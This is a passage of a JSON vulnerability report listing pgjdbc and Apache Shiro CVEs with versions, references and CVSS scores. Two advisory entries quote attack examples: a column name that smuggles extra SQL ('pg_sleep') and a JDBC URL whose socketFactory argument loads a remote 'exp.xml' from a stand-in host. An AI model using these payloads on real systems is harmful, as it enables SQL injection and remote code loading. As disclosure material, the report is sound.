org.postgresql:postgresql"},{"category":"details","details":"Vulnerability Details","text":"# Path traversal in org.postgresql:postgresql In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties.  ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-26520, CVE-2022-26520"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.1.0|<42.3.3"],"known_not_affected":["org.postgresql/postgresql@42.3.3"]},"references":[{"summary":"GitHub Advisory GHSA-673j-qm5f-xpv8","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8"},{"summary":"Postgresql Advisory changelog","url":"https://jdbc.postgresql.org/documentation/changelog.html#version_42.3.3"},{"summary":"Postgresql Advisory tomcat","url":"https://jdbc.postgresql.org/documentation/head/tomcat.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26520"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26520"},{"summary":"Debian Advisory dsa-5196","url":"https://www.debian.org/security/2022/dsa-5196"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":3.1,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.1,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":3.1,"temporalSeverity":"LOW","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.1.0|<42.3.3"]}],"title":"CVE-2022-26520/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-31197"]}],"cve":"CVE-2022-31197","cwe":{"id":"89","name":"Improper Neutralization of Special Elements used in an SQL Command"},"discovery_date":"2022-08-06T05:51:38","ids":[{"system_name":"CVE Record","text":"CVE-2022-31197"},{"system_name":"GitHub Advisory","text":"GHSA-r38f-c4h4-hqq2"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names"},{"category":"details","details":"Vulnerability Details","text":"# PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names ### Impact _What kind of vulnerability is it? Who is impacted?_  The PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. `;`, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user.  User applications that do not invoke the `ResultSet.refreshRow()` method are not impacted.  User application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the `refreshRow()` method on the ResultSet.  For example:  ```sql CREATE TABLE refresh_row_example (  id   int PRIMARY KEY,  \"1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * \" int ); ```  This example has a table with two columns. The name of the second column is crafted to contain a statement terminator followed by additional SQL. Invoking the `ResultSet.refreshRow()` on a ResultSet that queried this table, e.g. `SELECT * FROM refresh_row`, would cause the additional SQL commands such as the `SELECT pg_sleep(10)` invocation to be executed.  As the multi statement command would contain multiple results, it would not be possible for the attacker to get data directly out of this approach as the `ResultSet.refreshRow()` method would throw an exception. However, the attacker could execute any arbitrary SQL including inserting the data into another table that could then be read or any other DML / DDL statement.  Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user.  ### Patches _Has the problem been patched? What versions should users upgrade to?_  Yes, versions 42.2.26, 42.3.7, and 42.4.1 have been released with a fix.  ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_  Check that you are not using the `ResultSet.refreshRow()` method.  If you are, ensure that the code that executes that method does not connect to a database that is controlled by an unauthenticated or malicious user. If your application only connects to its own database with a fixed schema with no DDL permissions, then you will not be affected by this vulnerability as it requires a maliciously crafted schema.   ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-31197, CVE-2022-31197"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.7"],"known_not_affected":["org.postgresql/postgresql@42.3.7"]},"references":[{"summary":"GitHub Advisory GHSA-r38f-c4h4-hqq2","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00009.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-31197"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-31197"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.1,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.7"]}],"title":"CVE-2022-31197/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-21724"]}],"cve":"CVE-2022-21724","cwe":{"id":"665","name":"Improper Initialization"},"discovery_date":"2022-02-02T00:04:20","ids":[{"system_name":"CVE Record","text":"CVE-2022-21724"},{"system_name":"GitHub Advisory","text":"GHSA-v7wg-cpwc-24m4"},{"system_name":"Debian Advisory","text":"dsa-5196"},{"system_name":"NetApp Advisory","text":"ntap-20220311-0005"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements in Output Used by a Downstream Component","title":"Additional CWE: 74"},{"category":"description","details":"Vulnerability Description","text":"pgjdbc Does Not Check Class Instantiation when providing Plugin Classes"},{"category":"details","details":"Vulnerability Details","text":"# pgjdbc Does Not Check Class Instantiation when providing Plugin Classes ### Impact  pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.  However, the driver did not verify if the class implements the expected interface before instantiating the class.  Here's an example attack using an out-of-the-box class from Spring Framework:  ``` DriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml\"); ```  The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)  ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-21724, CVE-2022-21724"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.2"],"known_not_affected":["org.postgresql/postgresql@42.3.2"]},"references":[{"summary":"GitHub Advisory GHSA-v7wg-cpwc-24m4","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21724"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21724"},{"summary":"NetApp Advisory ntap-20220311-0005","url":"https://security.netapp.com/advisory/ntap-20220311-0005"},{"summary":"Debian Advisory dsa-5196","url":"https://www.debian.org/security/2022/dsa-5196"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.0,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.0,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.0,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.2"]}],"title":"CVE-2022-21724/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1957"]}],"cve":"CVE-2020-1957","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:53:18","ids":[{"system_name":"CVE Record","text":"CVE-2020-1957"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Authentication in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authentication in Apache Shiro Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.5.2"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17f371fc89d34df2d0c8131473fbc68154290e1be238895648f5a1e6%40%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb3982edf8bc8fcaa7a308e25a12d294fb4aac1f1e9d4e14fda639e77@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc64fb2336683feff3580c3c3a8b28e80525077621089641f2f386b63@%3Ccommits.camel.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00014.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1957"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1957"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.1"]}],"title":"CVE-2020-1957/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13933"]}],"cve":"CVE-2020-13933","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:54:23","ids":[{"system_name":"CVE Record","text":"CVE-2020-13933"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Authentication bypass in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Authentication bypass in Apache Shiro Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.3"],"known_not_affected":["org.apache.shiro/shiro-core@1.6.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r18b45d560d76c4260813c802771cc9678aa651fb8340e09366bfa198@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4506cedc401d6b8de83787f8436aac83956e411d66848c84785db46d@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4c1e1249e9e1acb868db0c80728c13f448d07333da06a0f1603c0a33@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r539f87706094e79c5da0826030384373f0041068936912876856835f%40%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r575301804bfac87a064359cf4b4ae9d514f2d10db7d44120765f4129@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6ea0224c1971a91dc6ade1f22508119a9c3bd56cef656f0c44bbfabb@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70098e336d02047ce4d4e69293fe8d558cd68cde06f6430398959bc4@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70b907ccb306e9391145e2b10f56cc6914a245f91720a17a486c020a@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8097b81905f2a113ebdf925bcbc6d8c9d6863c807c9ee42e1e7c9293@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ea6d8560d6354d41433ad006069904f0ed083527aa348b5999261a7@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb47d88af224e396ee34ffb88ee99fb6d04510de5722cf14b7137e6bc@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb5edf49cd1451475dbcf53826ba6ef1bb7872dd6493d6112eb0c2bad@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/08/msg00002.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13933"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13933"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.3"]}],"title":"CVE-2020-13933/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40664"]}],"cve":"CVE-2022-40664","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2022-10-12T12:00:16","ids":[{"system_name":"CVE Record","text":"CVE-2022-40664"},{"system_name":"Apache Advisory","text":"apache-shiro-1101-released"},{"system_name":"NetApp Advisory","text":"ntap-20221118-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro Authentication Bypass vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro Authentication Bypass vulnerability Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.10.0"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/12/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/12/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/13/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/loc2ktxng32xpy7lfwxto13k4lvnhjwg"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40664"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40664"},{"summary":"NetApp Advisory ntap-20221118-0005","url":"https://security.netapp.com/advisory/ntap-20221118-0005"},{"summary":"Apache Advisory","url":"https://shiro.apache.org/blog/2022/10/10/2022/apache-shiro-1101-released.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.1"]}],"title":"CVE-2022-40664/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-32532"]}],"cve":"CVE-2022-32532","cwe":{"id":"285","name":"Improper Authorization"},"discovery_date":"2022-06-30T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-32532"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Authorization","title":"Additional CWE: 863"},{"category":"description","details":"Vulnerability Description","text":"Improper Authorization in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authorization in Apache Shiro Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.0"],"known_not_affected":["org.apache.shiro/shiro-core@1.9.1"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-32532"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-32532"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.0"]}],"title":"CVE-2022-32532/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11989"]}],"cve":"CVE-2020-11989","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:53:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-11989"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Authentication in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authentication in Apache Shiro Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.2"],"known_not_affected":["org.apache.shiro/shiro-core@1.5.3"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r408fe60bc8fdfd7c74135249d646d7abadb807ebf90f6fd2b014df21@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675%40%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcf3d8041e1232201fe5d74fc612a193e435784d64002409b448b58fe@%3Cdev.geode.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11989"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11989"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.2"]}],"title":"CVE-2020-11989/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-41303"]}],"cve":"CVE-2021-41303","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-09-20T20:18:11","ids":[{"system_name":"CVE Record","text":"CVE-2021-41303"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220609-0001"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass Apache Shiro before 1.8.0, when using Apache Shiro with Spring Boot, a specially crafted HTTP request may cause an authentication bypass. Users should update to Apache Shiro 1.8.0."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.7.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.8.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raae98bb934e4bde304465896ea02d9798e257e486d04a42221e2c41b@%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re470be1ffea44bca28ccb0e67a4cf5d744e2d2b981d00fdbbf5abc13%40%3Cannounce.shiro.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41303"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41303"},{"summary":"NetApp Advisory ntap-20220609-0001","url":"https://security.netapp.com/advisory/ntap-20220609-0001"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.7.1"]}],"title":"CVE-2021-41303/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-46749"]}],"cve":"CVE-2023-46749","cwe":{"id":"22","name":"Improper Limitation of a Pathname to a Restricted Directory"},"discovery_date":"2024-01-15T12:30:19","ids":[{"system_name":"CVE Record","text":"CVE-2023-46749"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro vulnerable to path traversal"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro vulnerable to path traversal Apache Shiro before 1.130 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting   Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the 